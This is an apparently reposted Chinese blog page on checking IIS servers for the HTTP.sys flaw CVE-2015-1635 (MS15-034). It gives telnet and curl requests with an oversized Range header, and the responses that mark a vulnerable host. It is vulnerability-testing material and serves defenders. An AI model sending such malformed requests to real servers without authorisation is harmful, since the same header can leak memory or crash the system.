HTTP.SYS遠程代碼執行漏洞測試
簡介:html
在2015年4月安全補丁日,微軟發佈的衆多安全更新中,修復了HTTP.sys中一處容許遠程執行代碼漏洞,編號爲:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只須要發送惡意的http請求數據包,就可能遠程讀取IIS服務器的內存數據,或使服務器系統藍屏崩潰。根據公告顯示,該漏洞對服務器系統形成了不小的影響,主要影響了包括Windows 七、Windows Server 2008 R二、Windows 八、Windows Server 20十二、Windows 8.1 和 Windows Server 2012 R2在內的主流服務器操做系統。安全
測試:服務器
方法1:curl
# telnet www.test.com 80 GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615
方法2:測試
# curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
判斷是否存在漏洞:url
不存在該漏洞的響應包爲:spa
HTTP Error 400. The request has an invalid header name.
存在漏洞的響應包爲:操作系統
< HTTP/1.1 416 Requested Range Not Satisfiable < Content-Type: text/html < Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT < Accept-Ranges: bytes < ETag: "2edebc2929fce1:0"
參考連接:http://www.tiaozhanziwo.com/archives/765.htmlcode
相關文章
- 1. HTTP.sys遠程代碼執行漏洞
- 2. HTTP.sys遠程執行代碼漏洞
- 3. IIS_CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞復現
- 4. CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞復現
- 5. HTTP.sys 遠程執行代碼漏洞修復方案
- 6. HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)
- 7. MS15-034遠程執行代碼漏洞CVE-2015-1635IIS中的HTTP.sys 中的漏洞
- 8. [遠程代碼執行] 遠程代碼執行漏洞
- 9. (十)HTTP.sys遠程代碼執行
- 10. 遠程命令執行漏洞與遠程代碼執行漏洞33333
- 更多相關文章...
- • Markdown 代碼 - Markdown 教程
- • Eclipse 代碼模板 - Eclipse 教程
- • IntelliJ IDEA代碼格式化設置
- • IntelliJ IDEA安裝代碼格式化插件
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. HTTP.sys遠程代碼執行漏洞
- 2. HTTP.sys遠程執行代碼漏洞
- 3. IIS_CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞復現
- 4. CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞復現
- 5. HTTP.sys 遠程執行代碼漏洞修復方案
- 6. HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)
- 7. MS15-034遠程執行代碼漏洞CVE-2015-1635IIS中的HTTP.sys 中的漏洞
- 8. [遠程代碼執行] 遠程代碼執行漏洞
- 9. (十)HTTP.sys遠程代碼執行
- 10. 遠程命令執行漏洞與遠程代碼執行漏洞33333